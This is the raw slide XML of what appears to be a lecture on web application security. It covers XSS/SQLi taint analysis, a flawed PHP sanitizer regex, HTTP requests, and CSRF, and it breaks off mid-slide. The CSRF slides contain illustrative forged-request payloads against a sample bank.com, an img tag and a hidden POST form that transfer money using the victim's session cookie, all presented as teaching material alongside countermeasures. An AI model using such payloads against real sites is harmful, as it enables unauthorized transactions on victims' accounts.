              <a:rPr lang="en-US" dirty="0"/>
              <a:t> description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>portswigger.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/web-security/cross-site-scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162557808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XSS and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detecting XSS and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has been the focus of much research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both attacks can be modeled as a data flow problem:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data from the request (called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) should now flow into a string involved in a critical operation (called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>sink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) without sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting languages are difficult to analyze</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determining if the sanitization applied is correct is hard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190190381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Sanitization Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Be Tricky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MyEasyMarket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sanitization of parameter “www”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ereg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("[ˆA-Za-z0-9 .-@://]","",$www);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is the problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The author wanted to allow the ‘-’ character but instead declared the range between “.” and “@”, which includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151806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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a XSRF/CSRF attack, malicious JavaScript performs actions on a web application that the user is currently using</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user needs to be lured into accessing a malicious web page at the right time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1418668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a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr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Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="431800"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A resource can be specified by an absolute URI or an absolute path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800"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Absolute URIs are used when requesting a resource through a proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338"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GET http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800"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Absolute path URIs are used when requesting a resource to the server that owns that resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338"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GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2189803122"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="me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p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="257593"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rot="5400000">
            <a:off x="3430180"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3" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6920252"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5" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1362756" y="2836334"/>
            <a:ext cx="6341577" cy="1831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TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144259" y="2647050"/>
            <a:ext cx="1812065" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>User logs into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783798" y="3158231"/>
            <a:ext cx="2223761" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>User accesses malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1344202" y="3379759"/>
            <a:ext cx="2851505" cy="104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flipV="1">
            <a:off x="1366352" y="3774933"/>
            <a:ext cx="2851505" cy="10499"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1287216" y="3518479"/>
            <a:ext cx="5688727" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>bank.com/transfer.php?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=10000&amp;dest=617616615272" /&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7457838" y="1509631"/>
            <a:ext cx="936273" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028348" y="1452964"/>
            <a:ext cx="745742" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1360484" y="3115495"/>
            <a:ext cx="6341577" cy="18318"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2190829" y="2901787"/>
            <a:ext cx="4039763" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Set-Cookie: SESSIONID=73787638718723823764736873</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1384905" y="4268695"/>
            <a:ext cx="6341577" cy="1831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TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166407" y="3842107"/>
            <a:ext cx="3993401" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>transfer.php?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>=10000&amp;dest=617616615272</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Cookie: SESSIONID=73787638718723823764736873</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27" descr="serve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3455" y="1786630"/>
            <a:ext cx="665731" cy="807059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4031404" y="1804771"/>
            <a:ext cx="1083402" cy="701705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3588463" y="1786629"/>
            <a:ext cx="629394" cy="728773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="668647" y="1861958"/>
            <a:ext cx="1030029" cy="667136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388923285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CSRF Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid using GET methods when exporting functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, using forms and JavaScript one can invoke any script:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;form action=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>transfer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>” method=POST&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;input name=“amount” value=“10000” /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;input name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>” value=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>617616615272” /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
